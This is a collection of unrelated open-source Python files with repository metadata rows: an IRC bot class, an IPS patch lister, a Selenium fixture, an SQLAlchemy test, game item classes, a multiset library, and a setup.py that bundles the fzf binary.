self._send("NOTICE %s :%s" % (target, message))
def checkACC(self, nick):
""" Check the acc level of a nick """
self._send("NICKSERV ACC %s" % nick)
def joinChannel(self, channel):
""" Join a channel """
self._send("JOIN %s" % channel)
def partChannel(self, channel):
""" Leave a channel """
self._send("PART %s" % channel)
def setNick(self, nick):
""" Change nickname """
self.nick = nick
self.compileRe()
self._send("NICK %s" % nick)
logging.info('Nick changed!')
def setChannelTopic(self, channel, topic):
""" Change channel topic """
self._send("TOPIC %s :%s" % (channel, topic))
def kickUser(self, channel, nick, message):
""" Kick a user """
self._send("KICK %s %s :%s" % (channel, nick, message))
def quit(self, message="I'll be back!"):
""" Send quit message """
self._send("QUIT :%s" % message)
#-------------------------------------------------------------------------------
def loadCommands(self, commands):
"""
Loads a dict as self.commands and compiles regex (overwrites all)
"""
logging.info('Loading commands')
self.commands = commands
self._pool.map(self._compileCommandRe, self.commands)
def addCommand(self, name, regex, func):
"""
Add a command to the self.commands dict
(overwrites commands with the same <name>)
"""
self.commands[name] = CommandHandle(regex, func)
self._compileCommandRe(name)
logging.info('Command: %s added!' % name)
def removeCommand(self, name):
""" Remove <name> command from the self.commands dict """
del self.commands[name]
logging.info('Command: %s removed!' % name)
#-------------------------------------------------------------------------------
def _compileServerRe(self, command):
""" Compiles single server regex by command name """
self._serverRe[command].cregex = []
logging.debug(self._serverRe[command].regex)
for item in self._serverRe[command].regex:
self._serverRe[command].cregex.append(re.compile(item))
def _compileCommandRe(self, command):
""" Compiles single command regex by command name """
self.commands[command].cregex = []
logging.debug(self.commands[command].regex)
for item in self.commands[command].regex:
self.commands[command].cregex.append(re.compile(item))
def compileRe(self):
""" Uses the thread pool to compile all the commands regex """
logging.info('Compiling regex!')
self._pool.map(self._compileServerRe, self._serverRe)
self._pool.map(self._compileCommandRe, self.commands)
def _autoJoin(self):
""" Join all the channels in self.autojoin """
for chan in self.joinChans:
logging.info('Auto joining: %s' % chan)
self.joinChannel(chan)
#-------------------------------------------------------------------------------
def _sniffLine(self, line):
"""
Searches the line for anything relevent
executes the function for the match
"""
match = False
for name in self._serverRe:
for item in self._serverRe[name].cregex:
match = item.search(line)
if match:
self._serverRe[name].function(match)
return True
def _sniffMessage(self, match):
"""
Search PRIVMESG/NOTICE for a command
executes the function for the match
"""
nick, host, chan, message = \
match.group(1), match.group(2), match.group(3), match.group(4)
cmatch = False
logging.info('[%s] %s: %s' % (chan, nick, message))
for name in self.commands:
for regex in self.commands[name].cregex:
cmatch = regex.search(message)
if cmatch:
self.commands[name].function(chan, nick, host, cmatch)
return True
#-------------------------------------------------------------------------------
def _identifyNick(self, pswrd):
""" Identify bot nickname with nickserv """
self._send("NICKSERV IDENTIFY %s" % (pswrd))
def auth(self, nick):
""" Login to the IRC server and identify with nickserv"""
logging.info('Authenticating bot with server...')
self._send(
"USER %s %s %s :This bot is a result of open-source development." %\
(nick, nick, nick)
)
self._send("NICK %s" % nick)
if self.pswrd:
logging.debug('We have a nick password!')
self._identifyNick(self.pswrd)
logging.info('Waiting on Nickserv...')
count = 0
while not self._authed:
time.sleep(5)
count += 1
if count > 5:
raise RuntimeError('Failed to auth with Nickserv')
else:
self._authed = True
def _send(self, message):
""" Sends a message to IRC server """
logging.debug("> %s" % message)
message = "%s\r\n" % message
try:
self._sock.send(message.encode("utf-8"))
except (socket.timeout, socket.error, ssl.SSLError) as e:
logging.warning("Socket Error: Could not send!")
logging.exception(e)
self._connected = False
except Exception as e:
logging.exception(e)
self._connected, self._running = False, False
def _listen(self):
""" This should be running in a thread """
logging.info('Listening...')
while self._connected:
try:
data = self._sock.recv(4096)
except (socket.timeout, ssl.SSLError) as e:
if 'timed out' in e.args[0]:
continue
else:
logging.exception(e)
self._connected = False
continue
except socket.error as e:
logging.exception(e)
self._connected = False
continue
else:
if len(data) == 0:
logging.warn('Listen socket closed!')
self._connected = False
continue
try:
data = data.strip(b'\r\n').decode("utf-8")
self._listenPool.map(self._sniffLine, data.splitlines())
except Exception as e:
logging.exception(e)
continue
self._listenPool.join()
logging.info('No longer listening...')
def connect(self):
"""Connect the socket to the server and listen"""
while not self._connected:
logging.info("Connecting to %s:%s" % (self.host, str(self.port)))
self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._sock.settimeout(2)
if not self._sock.getsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE):
logging.debug('Keeping socket alive')
self._sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
if self.ssl:
self._sock = ssl.wrap_socket(self._sock)
try:
self._sock.connect((self.host, self.port))
except (socket.timeout, socket.error, ssl.SSLError) as e:
logging.exception(e)
time.sleep(1.0)
continue
except Exception as e:
logging.exception(e)
self._connected, self._running = False, False
else:
logging.info("Connected!")
self._connected = True
def disconnect(self):
""" Disconnect from the server """
logging.info('Disconnecting...')
self._connected, self._running, self._authed = False, False, False
self.servHost, self.channels = None, {}
try:
self._pool.close()
self._listenPool.close()
except Exception as e:
logging.exception(e)
logging.debug('Pool closed')
try:
self._pool.join()
except Exception as e:
logging.exception(e)
logging.debug('Pool joined')
self._pool = Pool(self.threads)
logging.debug('Pool cleared')
try:
self._listenThread.join()
except Exception as e:
logging.exception(e)
logging.debug('Listen Thread joined(?)')
try:
self._sock.close()
except Exception as e:
logging.exception(e)
logging.debug('Socket closed(?)')
logging.info('Disconnected!')
def __call__(self):
""" Starts the connection to the server """
self._running = True
while self._running:
self.compileRe()
self._listenThread = Process(name='Listener', target=self._listen)
self._listenThread.daemon = True
try:
self.connect()
self._listenThread.start()
self.auth(self.nick)
except:
self.disconnect()
continue
self._autoJoin()
while self._connected:
try:
time.sleep(0.5)
except:
self.disconnect()
if __name__ == "__main__":
logging.basicConfig(
format='[%(asctime)s] %(message)s',
datefmt="%m-%d %H:%M:%S",
level=logging.DEBUG
)
logger = logging.getLogger()
logger.addHandler(
RotatingFileHandler('ircbot.log', maxBytes=10**9, backupCount=5)
)
bot = IRCServer('s10tb0t', ssl=True)
def shutit(channel, nick, host, match):
bot.sendMessage(channel, '%s asked me to quit! See ya!' % nick)
bot._running = False
bot.quit()
bot.addCommand('Quit', r'^!quit', shutit)
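    # Illustrative extra command (an assumption, not part of the original
    # script): echo back any channel message that starts with "!echo".
    def echo(channel, nick, host, match):
        bot.sendMessage(channel, '%s said: %s' % (nick, match.group(1)))
    bot.addCommand('Echo', r'^!echo (.*)', echo)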
bot()
|
gpl-3.0
| 6,888,434,177,947,593,000 | 37.680233 | 81 | 0.502831 | false |
superjamie/snippets
|
ips-ls.py
|
1
|
1502
|
#!/usr/bin/python
## lists contents of an IPS patch
## stole the processing from meunierd's python-ips
## License: MIT - https://opensource.org/licenses/MIT
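## IPS format refresher: after the 5-byte 'PATCH' header, each record is a
## 3-byte big-endian offset, a 2-byte payload size, then that many data bytes;
## a size of 0 marks an RLE record (2-byte run length plus one repeated byte).
## The file ends with the 3-byte literal 'EOF'.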
from os.path import getsize,isfile
import struct
from sys import argv
def print_usage_and_exit():
print "Usage: {script} [IPS patch file]".format(script=argv[0])
exit(1)
def unpack_int(string):
"""Read an n-byte big-endian integer from a byte string."""
(ret,) = struct.unpack_from('>I', b'\x00' * (4 - len(string)) + string)
return ret
try:
    patchpath = argv[1]
    if not isfile(patchpath):
        raise IOError('not an existing file')
patch_size = getsize(patchpath)
except:
print_usage_and_exit()
with open(patchpath, 'rb') as patchfile:
if patchfile.read(5) != b'PATCH':
raise Exception('Invalid patch header.')
# Read First Record
r = patchfile.read(3)
while patchfile.tell() not in [patch_size, patch_size - 3]:
# Unpack 3-byte pointers.
offset = unpack_int(r)
# Read size of data chunk
r = patchfile.read(2)
size = unpack_int(r)
if size == 0: # RLE Record
r = patchfile.read(2)
rle_size = unpack_int(r)
data = patchfile.read(1) * rle_size
else:
data = patchfile.read(size)
if offset >= 0:
# Write to file
print "Offset: {offset}".format(offset=hex(offset))
print "Data : {data}".format(data=repr(data))
# Read Next Record
r = patchfile.read(3)
|
gpl-2.0
| 3,190,011,513,683,501,000 | 29.653061 | 75 | 0.597204 | false |
anjel-ershova/python_training
|
fixture/application.py
|
1
|
1140
|
from selenium import webdriver
from fixture.session import SessionHelper
from fixture.fixture_group import GroupHelper
from fixture.navigation import NavigationHelper
from fixture.fixture_contact import *
class Application:
def __init__(self, browser, baseurl):
if browser == 'firefox':
self.wd = webdriver.Firefox()
elif browser == 'chrome':
self.wd = webdriver.Chrome()
elif browser == 'ie':
self.wd = webdriver.Ie()
self.wd.implicitly_wait(10)
elif browser == 'edge':
self.wd = webdriver.Edge()
else:
raise ValueError('Unrecognized browser %s' % browser)
self.session = SessionHelper(self)
self.contact = ContactHelper(self)
self.group = GroupHelper(self)
self.navigation = NavigationHelper(self)
self.baseurl = baseurl
    # method that checks whether the fixture is still valid
def is_valid(self):
try:
self.wd.current_url
return True
except:
return False
def destroy(self):
self.wd.quit()
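# Usage sketch (the browser and base URL are illustrative, not taken from the
# project's config):
#   app = Application(browser='chrome', baseurl='http://localhost/addressbook/')
#   if app.is_valid():
#       app.destroy()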
|
apache-2.0
| 8,681,497,553,056,534,000 | 29.75 | 65 | 0.610659 | false |
bplower/legendary-waffle-lib
|
test/test_attribute_create.py
|
1
|
1029
|
#!/usr/bin/env python
"""
This tests the general database CRUD functions
"""
import os
import sys
import sqlalchemy
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
import legendary_waffle
db_engine = sqlalchemy.create_engine("sqlite://")
legendary_waffle.models.MODELBASE.metadata.create_all(db_engine)
legendary_waffle.models.MODELBASE.metadata.bind = db_engine
db_session = sqlalchemy.orm.sessionmaker(bind=db_engine)
db = db_session()
print legendary_waffle.attribute_read(db)
legendary_waffle.model_create(db, legendary_waffle.models.Attribute, name = 'butts')
print legendary_waffle.attribute_read(db)
legendary_waffle.model_update(db, legendary_waffle.models.Attribute, 1, name = 'poop')
print legendary_waffle.model_read(db, legendary_waffle.models.Attribute)
print legendary_waffle.model_read(db, legendary_waffle.models.Attribute, 1)
legendary_waffle.model_delete(db, legendary_waffle.models.Attribute, 1)
print legendary_waffle.model_read(db, legendary_waffle.models.Attribute)
|
apache-2.0
| -5,286,218,143,307,776,000 | 35.75 | 86 | 0.785228 | false |
grantcolasurdo/geras
|
age/items.py
|
1
|
10048
|
"""This is a repository for items in AGE"""
import csv
__author__ = "Grant Colasurdo"
class Items:
"""This class manages the meta-info of """
def __init__(self, character):
self.character = character
class Item:
def __init__(self, csv_row):
self.item_name: str = csv_row['item_name']
        self.weight: float = float(csv_row['weight'])
        self.size: float = float(csv_row['size'])
        self.value: float = float(csv_row['value'])
        self.hands_to_wield: int = int(csv_row['hands_to_wield'])
class Wear:
"""Handle the meta data for clothing worn by a character
Notes
-----
Attributes link to places that clothes can be worn. Some positions have 3 layers represented by placement on a list.
[Under, Normal, Over]
"""
def __init__(self, character):
self.character = character
self.armor: WearLocation = WearLocation(self, "Armor", (False, False, True))
self.feet: WearLocation = WearLocation(self, "Feet", (True, True, True))
self.legs: WearLocation = WearLocation(self, "Legs", (True, True, True))
self.waist: WearLocation = WearLocation(self, "Waist", (False, True, False))
self.torso: WearLocation = WearLocation(self, "Torso", (True, True, True))
self.head: WearLocation = WearLocation(self, "Head", (False, True, True))
self.face: WearLocation = WearLocation(self, "Face", (False, True, False))
self.hands: WearLocation = WearLocation(self, "Hands", (False, True, False))
self.back: WearLocation = WearLocation(self, "Back", (False, True, False))
self.location_list = {'armor', 'feet', 'legs', 'waist', 'torso', 'head', 'face', 'hands', 'back'}
@property
def worn_weight(self):
        return sum(self.__dict__[location].weight for location in self.location_list)
class WearSlot:
"""Each wear slot can hold 1 clothing or armor item"""
    def __init__(self, wear_location: 'WearLocation'):
        self.wear_slot = wear_location
        self.enabled = False  # If the slot is disabled, no item can be assigned
        self._item = None  # Backing field; the normal spot for most clothing
    @property
    def item(self):
        return self._item
    @item.setter
    def item(self, value: Item):
        if self.enabled:
            self._item = value
        else:
            print("This equipment slot is disabled")
@property
def weight(self) -> int:
if self.item is None:
return 0
else:
return self.item.weight
class WearLocation:
"""A position on the body that can be equipped with wearable"""
def __init__(self, wear: Wear, location_name, enabled_slots):
self.wear_root = wear
self.location_name = location_name
self.under_slot = WearSlot(self)
self.middle_slot = WearSlot(self)
self.over_slot = WearSlot(self)
self.under_slot.enabled = enabled_slots[0]
self.middle_slot.enabled = enabled_slots[1]
self.over_slot.enabled = enabled_slots[2]
@property
def weight(self):
        return self.under_slot.weight + self.middle_slot.weight + self.over_slot.weight
class Currency(Item):
def __init__(self, csv_row):
super().__init__(csv_row)
class Container(Item):
def __init__(self, csv_row):
        self._weight = None
        super(Container, self).__init__(csv_row)
        self.items = set()
        self.volume_capacity = float(csv_row['volume_capacity'])
        self.weight_capacity = float(csv_row['weight_capacity'])
self.lock = None
@property
def weight(self) -> float:
contained_weight = sum([item.weight for item in self.items])
return contained_weight + self.self_weight
@weight.setter
def weight(self, value: float):
self._weight = value
@property
def self_weight(self) -> float:
return self._weight
@self_weight.setter
def self_weight(self, value: float):
self._weight = value
@property
def remaining_weight(self):
return self.weight_capacity - self.weight
@property
def occupied_space(self):
return sum([item.size for item in self.items])
@property
def remaining_space(self):
return self.volume_capacity - self.occupied_space
def insert(self, item: Item):
try:
assert self.remaining_space >= item.size
self.items.add(item)
except AssertionError:
print("There is not enough space or spare weight in the container to add")
def remove(self, item: Item):
try:
assert item in self.items
self.items.remove(item)
except AssertionError:
print("That item is not in the container")
class Weapon(Item):
def __init__(self, csv_row):
super().__init__(csv_row)
self.damage_rolls = csv_row['weapon_damage']
self.weapon_group = csv_row['weapon_group']
self.minimum_strength = csv_row['minimum_strength']
        self.short_range = csv_row['short_range']
        self.long_range = csv_row['maximum_range']
self.minimum_range = csv_row['minimum_range']
class Missile(Weapon):
def __init__(self, csv_row):
self.missile_used = None
super().__init__(csv_row)
class Armor(Item):
def __init__(self, csv_row):
        self.rating = int(csv_row['armor_rating'])
        self.weight_class = csv_row['armor_weight_class']
        self.penalty = int(csv_row['armor_penalty'])
        self.strain = int(csv_row['armor_strain'])
super().__init__(csv_row)
class Shield(Item):
def __init__(self, csv_row):
self.weight_class = csv_row['armor_weight_class']
        self.defense_modifier = int(csv_row['shield_bonus'])
super().__init__(csv_row)
class Lock(Item):
def __init__(self, csv_row):
self.is_locked = None
super().__init__(csv_row)
class Tool(Item):
def __init__(self, csv_row):
super(Tool, self).__init__(csv_row)
class Traveling(Item):
def __init__(self, csv_row):
super(Traveling, self).__init__(csv_row)
class Clothing(Item):
def __init__(self, csv_row):
super(Clothing, self).__init__(csv_row)
class TradeGoods(Item):
def __init__(self, csv_row):
super(TradeGoods, self).__init__(csv_row)
class ProfessionalGear(Item):
def __init__(self, csv_row):
super(ProfessionalGear, self).__init__(csv_row)
class HomeAndHearth(Item):
def __init__(self, csv_row):
super(HomeAndHearth, self).__init__(csv_row)
class FoodAndLodging(Item):
def __init__(self, csv_row):
super(FoodAndLodging, self).__init__(csv_row)
class Equipment:
"""This will manage the meta level information for the items used in combat for a character"""
def __init__(self, character):
self.character = character
self.primary_hand = None # Link to an item that the primary hand is holding
self.secondary_hand = None # Link to an item that the secondary hand is holding
self._backpack = None # Link to an item that is worn on the character's back
@property
def armor_value(self) -> int:
"""The amount of protection your armor affords you"""
return self.character.wear.armor.over_slot.item.rating
@property
def armor_penalty(self) -> int:
"""The penalty applied to speed and Dexterity if untrained in the armor class"""
return self.armor.penalty
@property
def armor_strain(self):
"""The penalty applied to magic rolls"""
        return self.character.wear.armor.over_slot.item.strain
@property
def armor(self) -> Armor:
"""Return the armor object being worn by the character"""
return self.character.wear.armor.over_slot.item
@armor.setter
def armor(self, value: Armor):
self.character.wear.armor.over_slot.item = value
@property
def shield_bonus(self):
"""Return the bonus to defense gained from having a shield"""
bonus_value = 0
try:
bonus_value = max(self.primary_hand.defense_modifier, bonus_value)
except AttributeError:
pass
try:
            bonus_value = max(self.secondary_hand.defense_modifier, bonus_value)
except AttributeError:
pass
return bonus_value
@property
def backpack(self):
"""Return the backpack item worn by the character"""
return self.character.wear.back.middle_slot.item
@backpack.setter
def backpack(self, value: Container):
self.character.wear.back.middle_slot.item = value
ITEM_CLASS_DICT = {
"Currency": Currency,
"Container": Container,
"Item": Item,
"Lock": Lock,
"Tool": Tool,
"Missile": Missile,
"Traveling": Traveling,
"Clothing": Clothing,
"Trade Goods": TradeGoods,
"Professional Gear": ProfessionalGear,
"Home and Hearth": HomeAndHearth,
"Food and Lodging": FoodAndLodging,
"Weapon": Weapon,
"Armor": Armor,
"Shield": Shield
}
def new_item(item_name) -> Item:
item = None
with open('items.csv', 'r') as file:
item_db = csv.DictReader(file)
for row in item_db:
if row['item_name'] == item_name:
item_class = row['item_class']
class_to_call = ITEM_CLASS_DICT[item_class]
item = class_to_call(row)
return item
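# Illustrative items.csv rows (column names inferred from the readers above;
# the concrete values are assumptions, not taken from the real data file):
#   item_name,item_class,weight,size,value,hands_to_wield,volume_capacity,weight_capacity
#   Backpack,Container,2.0,20.0,2.0,0,30.0,40.0
#   Shirt,Clothing,0.5,2.0,1.0,0,,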
def init_items(character):
    character.equipment = Equipment(character)
    character.items = Items(character)
    character.wear = Wear(character)
    starting_items = set()
    character.wear.back.middle_slot.item = new_item("Backpack")
    character.wear.torso.under_slot.item = new_item("Underclothes")
character.wear.feet.middle_slot.item = new_item("Boots")
character.wear.waist.middle_slot.item = new_item("Belt")
character.wear.legs.middle_slot.item = new_item("Pants")
character.wear.torso.middle_slot.item = new_item("Shirt")
character.wear.torso.over_slot.item = new_item("Jacket")
starting_items.add(new_item("Waterskin"))
|
gpl-2.0
| 4,637,744,781,462,521,000 | 29.916923 | 120 | 0.618631 | false |
maweki/more-collections
|
more_collections/multisets.py
|
1
|
5254
|
try: # Python compat < 3.3
from collections.abc import Set, MutableSet, Hashable, Iterable
except ImportError:
from collections import Set, MutableSet, Hashable, Iterable
from collections import defaultdict
from functools import reduce
from itertools import chain
import operator
try: # Python compat < 3.4
from functools import partialmethod
except ImportError:
from .common import partialmethod
class _base_multiset(Set):
def __init__(self, items=None):
self.__bag = {}
if isinstance(items, Iterable):
for i in items:
self.__bag[i] = self.__bag.get(i, 0) + 1
def __contains__(self, item):
return self.__bag.get(item, 0) > 0
def __len__(self):
return sum(self.__bag.values())
def __iter__(self):
for item in self.__bag:
for _ in range(self.__bag[item]):
yield item
def __le__(self, other):
if not isinstance(other, _base_multiset) or isinstance(other, _orderable_mixin):
raise NotImplementedError()
return all((self.count(i) <= other.count(i)) for i in self.__bag)
def __eq__(self, other):
if not isinstance(other, _base_multiset):
raise NotImplementedError()
return all((self.count(i) == other.count(i)) for i in chain(self.__bag, other.__bag))
def __lt__(self, other):
return (self <= other) and not (self == other)
def __gt__(self, other):
if not isinstance(other, _base_multiset):
raise NotImplementedError()
return other < self
def __ge__(self, other):
if not isinstance(other, _base_multiset):
raise NotImplementedError()
return other <= self
def __combine(self, amnt_op, this_op, other):
if isinstance(other, _base_multiset):
result = self.__class__()
for element in chain(self.__bag, other.__bag):
amount = amnt_op(self.count(element), other.count(element))
if amount > 0:
result.__bag[element] = amount
return result
if isinstance(other, Iterable):
return this_op(self, self.__class__(other))
raise NotImplementedError()
__sub__ = partialmethod(__combine, operator.sub, operator.sub)
__add__ = partialmethod(__combine, operator.add, operator.add)
__or__ = partialmethod(__combine, max, operator.or_)
__and__ = partialmethod(__combine, min, operator.and_)
__xor__ = partialmethod(__combine, lambda l, r: abs(l - r), operator.xor)
def count(self, item):
return self.__bag.get(item, 0)
def items(self):
return self.__bag.items()
class _orderable_mixin(object):
# Using the Dershowitz-Manna ordering that gives a well-founded ordering
# on multisets if the given carrier is ordered (strings, integers, etc.)
# This fails if the union of the sets that are compared has elements that
# are incomparible
# https://en.wikipedia.org/wiki/Dershowitz%E2%80%93Manna_ordering
def __le__(self, other):
if not (isinstance(other, _orderable_mixin)):
raise NotImplementedError()
# using definition by Huet and Oppen
M, N = self.count, other.count
S = frozenset(self | other)
ys = (y for y in S if M(y) > N(y))
return all(any((y < x and M(x) < N(x)) for x in S) for y in ys)
def __lt__(self, other):
if not (isinstance(other, _orderable_mixin)):
raise NotImplementedError()
return self != other and self <= other
def __gt__(self, other):
return not (self <= other)
def __ge__(self, other):
return not (self < other)
class multiset(_base_multiset, MutableSet):
def add(self, item):
self._base_multiset__bag[item] = self.count(item) + 1
def discard(self, item):
bag = self._base_multiset__bag
if item in bag:
bag[item] = bag[item] - 1
if bag[item] == 0:
del bag[item]
class frozenmultiset(_base_multiset, Hashable):
def __hash__(self):
from operator import xor
pots = (hash(key)**value for (key, value) in self.items())
return reduce(xor, pots, hash(())) ^ hash(self.__class__)
class orderable_multiset(_orderable_mixin, multiset):
pass
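# Worked example of the ordering (values are illustrative):
#   orderable_multiset([1, 1, 2]) < orderable_multiset([1, 3])  # True
# because each element the left bag holds in excess (1 and 2) is dominated by
# a larger element (3) held in excess by the right bag.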
class orderable_frozenmultiset(_orderable_mixin, frozenmultiset):
pass
class nestable_orderable_frozenmultiset(orderable_frozenmultiset):
# Natural multiset extension for nested multisets over an orderable carrier
# again gives a well-founded total ordering
def __gt__(self, other):
if not isinstance(other, self.__class__):
return True
return super(self.__class__, self).__gt__(other)
def __ge__(self, other):
if not isinstance(other, self.__class__):
return True
return super(self.__class__, self).__ge__(other)
def __lt__(self, other):
if not isinstance(other, self.__class__):
return False
return super(self.__class__, self).__lt__(other)
def __le__(self, other):
if not isinstance(other, self.__class__):
return False
return super(self.__class__, self).__le__(other)
|
mit
| 8,331,213,310,677,032,000 | 33.116883 | 93 | 0.597069 | false |
dahlia/iterfzf
|
setup.py
|
1
|
12011
|
import distutils.core
import distutils.errors
import json
import os
import os.path
import platform
import re
import shutil
import sys
import tarfile
import tempfile
import warnings
import zipfile
try:
import urllib2
except ImportError:
from urllib import request as urllib2
from setuptools import setup
fzf_version = '0.20.0'
version = '0.5.' + fzf_version
release_url = ('https://api.github.com/repos/junegunn/fzf-bin/releases/tags/' +
fzf_version)
asset_filename_re = re.compile(
r'^fzf-(?P<ver>\d+\.\d+\.\d+)-'
r'(?P<plat>[^-]+)_(?P<arch>[^.]+)'
r'.(?P<ext>tgz|tar\.gz|tar\.bz2|zip)$'
)
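# Example asset name matched by the pattern above (illustrative):
#   'fzf-0.20.0-linux_amd64.tgz' -> ver='0.20.0', plat='linux',
#   arch='amd64', ext='tgz'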
fzf_bin_path = os.path.join(os.path.dirname(__file__), 'iterfzf', 'fzf')
fzf_windows_bin_path = os.path.join(os.path.dirname(__file__),
'iterfzf', 'fzf.exe')
urllib_retry = 3
def readme():
path = os.path.join(os.path.dirname(__file__), 'README.rst')
try:
with open(path) as f:
return f.read()
except IOError:
pass
def get_fzf_release(access_token=None):
filename = 'fzf-{0}-release.json'.format(fzf_version)
filepath = os.path.join(os.path.dirname(__file__), filename)
try:
with open(filepath) as f:
d = f.read()
except IOError:
if access_token:
request = urllib2.Request(
release_url,
headers={'Authorization': 'token ' + access_token},
)
else:
request = release_url
try:
r = urllib2.urlopen(request)
except urllib2.HTTPError as e:
            if e.code == 403 and e.info().get('X-RateLimit-Remaining') == '0':
                raise RuntimeError(
                    'GitHub rate limit reached. To increase the limit use '
'-g/--github-access-token option.\n ' + str(e)
)
elif e.code == 401 and access_token:
raise RuntimeError('Invalid GitHub access token.')
raise
d = r.read()
r.close()
mode = 'w' + ('b' if isinstance(d, bytes) else '')
try:
with open(filename, mode) as f:
f.write(d)
except IOError:
pass
try:
return json.loads(d)
except TypeError:
return json.loads(d.decode('utf-8'))
def get_fzf_binary_url(plat, arch, access_token=None):
release = get_fzf_release(access_token=access_token)
for asset in release['assets']:
m = asset_filename_re.match(asset['name'])
if not m:
warnings.warn('unmatched filename: ' + repr(asset['name']))
continue
elif m.group('ver') != fzf_version:
warnings.warn('unmatched version: ' + repr(asset['name']))
continue
elif m.group('plat') == plat and m.group('arch') == arch:
return asset['browser_download_url'], m.group('ext')
def extract(stream, ext, extract_to):
with tempfile.NamedTemporaryFile() as tmp:
shutil.copyfileobj(stream, tmp)
tmp.flush()
tmp.seek(0)
if ext == 'zip':
z = zipfile.ZipFile(tmp, 'r')
try:
info, = z.infolist()
with open(extract_to, 'wb') as f:
f.write(z.read(info))
finally:
z.close()
elif ext == 'tgz' or ext.startswith('tar.'):
tar = tarfile.open(fileobj=tmp)
try:
member, = [m for m in tar.getmembers() if m.isfile()]
rf = tar.extractfile(member)
with open(extract_to, 'wb') as wf:
shutil.copyfileobj(rf, wf)
finally:
tar.close()
else:
raise ValueError('unsupported file format: ' + repr(ext))
def download_fzf_binary(plat, arch, overwrite=False, access_token=None):
bin_path = fzf_windows_bin_path if plat == 'windows' else fzf_bin_path
if overwrite or not os.path.isfile(bin_path):
asset = get_fzf_binary_url(plat, arch, access_token)
url, ext = asset
if access_token:
url = '{0}?access_token={1}'.format(url, access_token)
try:
r = urllib2.urlopen(url)
except urllib2.HTTPError as e:
            if e.code == 403 and e.info().get('X-RateLimit-Remaining') == '0':
                raise RuntimeError(
                    'GitHub rate limit reached. To increase the limit use '
'-g/--github-access-token option.\n ' + str(e)
)
elif e.code == 401 and access_token:
raise RuntimeError('Invalid GitHub access token.')
raise
extract(r, ext, bin_path)
r.close()
mode = os.stat(bin_path).st_mode
if not (mode & 0o111):
os.chmod(bin_path, mode | 0o111)
def get_current_plat_arch():
archs = {
'i686': '386', 'i386': '386',
'x86_64': 'amd64', 'amd64': 'amd64',
}
machine = platform.machine()
if not machine and sys.platform in ('win32', 'cygwin'):
bits, linkage = platform.architecture()
try:
machine = {'32bit': 'i386', '64bit': 'amd64'}[bits]
except KeyError:
raise ValueError('unsupported architecture: ' +
repr((bits, linkage)))
machine = machine.lower()
if sys.platform.startswith('linux'):
archs.update(
armv5l='arm5', armv6l='arm6', armv7l='arm7', armv8l='arm8',
)
try:
arch = archs[machine]
except KeyError:
raise ValueError('unsupported machine: ' + repr(machine))
if sys.platform.startswith('linux'):
return 'linux', arch
elif sys.platform.startswith('freebsd'):
return 'freebsd', arch
elif sys.platform.startswith('openbsd'):
        return 'openbsd', arch
elif sys.platform == 'darwin':
return 'darwin', arch
elif sys.platform in ('win32', 'cygwin'):
return 'windows', arch
else:
raise ValueError('unsupported platform: ' + repr(sys.platform))
class bundle_fzf(distutils.core.Command):
description = 'download and bundle a fzf binary'
user_options = [
('plat=', 'p', 'platform e.g. windows, linux, freebsd, darwin'),
('arch=', 'a', 'architecture e.g. 386, amd64, arm8'),
('no-overwrite', 'O', 'do not overwrite if fzf binary exists'),
(
'github-access-token=', 'g',
            'GitHub API access token to increase the rate limit',
),
]
boolean_options = ['no-overwrite']
def initialize_options(self):
try:
self.plat, self.arch = get_current_plat_arch()
except ValueError:
self.plat = None
self.arch = None
self.no_overwrite = None
self.github_access_token = None
self.plat_name = None
def finalize_options(self):
if self.plat is None:
raise distutils.errors.DistutilsOptionError(
'-p/--plat option is required but missing'
)
if self.arch is None:
raise distutils.errors.DistutilsOptionError(
'-a/--arch option is required but missing'
)
try:
self.plat_name = self.get_plat_name()
except ValueError as e:
raise distutils.errors.DistutilsOptionError(str(e))
distutils.log.info('plat_name: %s', self.plat_name)
def get_plat_name(self, plat=None, arch=None):
plat = plat or self.plat
arch = arch or self.arch
if plat == 'linux':
arch_tags = {
'386': 'i686', 'amd64': 'x86_64',
'arm5': 'armv5l', 'arm6': 'armv6l',
'arm7': 'armv7l', 'arm8': 'armv8l',
}
try:
arch_tag = arch_tags[arch]
except KeyError:
raise ValueError('unsupported arch: ' + repr(arch))
return 'manylinux1_' + arch_tag
elif plat in ('freebsd', 'openbsd'):
arch_tags = {'386': 'i386', 'amd64': 'amd64'}
try:
arch_tag = arch_tags[arch]
except KeyError:
raise ValueError('unsupported arch: ' + repr(arch))
return '{0}_{1}'.format(plat, arch_tag)
elif plat == 'darwin':
if arch == '386':
archs = 'i386',
elif arch == 'amd64':
archs = 'intel', 'x86_64'
else:
raise ValueError('unsupported arch: ' + repr(arch))
macs = 10, 11, 12
return '.'.join('macosx_10_{0}_{1}'.format(mac, arch)
for mac in macs for arch in archs)
elif plat == 'windows':
if arch == '386':
return 'win32'
elif arch == 'amd64':
return 'win_amd64'
else:
raise ValueError('unsupported arch: ' + repr(arch))
else:
raise ValueError('unsupported plat: ' + repr(plat))
def run(self):
dist = self.distribution
try:
bdist_wheel = dist.command_options['bdist_wheel']
except KeyError:
self.warn(
                'this command is intended to be used together with bdist_wheel'
' (e.g. "{0} {1} bdist_wheel")'.format(
dist.script_name, ' '.join(dist.script_args)
)
)
else:
typename = type(self).__name__
bdist_wheel.setdefault('universal', (typename, True))
plat_name = self.plat_name
bdist_wheel.setdefault('plat_name', (typename, plat_name))
bdist_wheel_cls = dist.cmdclass['bdist_wheel']
get_tag_orig = bdist_wheel_cls.get_tag
def get_tag(self): # monkeypatch bdist_wheel.get_tag()
if self.plat_name_supplied and self.plat_name == plat_name:
return get_tag_orig(self)[:2] + (plat_name,)
return get_tag_orig(self)
bdist_wheel_cls.get_tag = get_tag
download_fzf_binary(self.plat, self.arch,
overwrite=not self.no_overwrite,
access_token=self.github_access_token)
if dist.package_data is None:
dist.package_data = {}
dist.package_data.setdefault('iterfzf', []).append(
'fzf.exe' if self.plat == 'windows' else 'fzf'
)
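# Example invocation of the command defined above (plat/arch values are
# illustrative; both default to the current machine when omitted):
#   python setup.py bundle_fzf -p linux -a amd64 bdist_wheel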
setup(
name='iterfzf',
version=version,
description='Pythonic interface to fzf',
long_description=readme(),
url='https://github.com/dahlia/iterfzf',
author='Hong Minhee',
author_email='hong.minhee' '@' 'gmail.com',
license='GPLv3 or later',
packages=['iterfzf'],
package_data={'iterfzf': ['py.typed']},
cmdclass={'bundle_fzf': bundle_fzf},
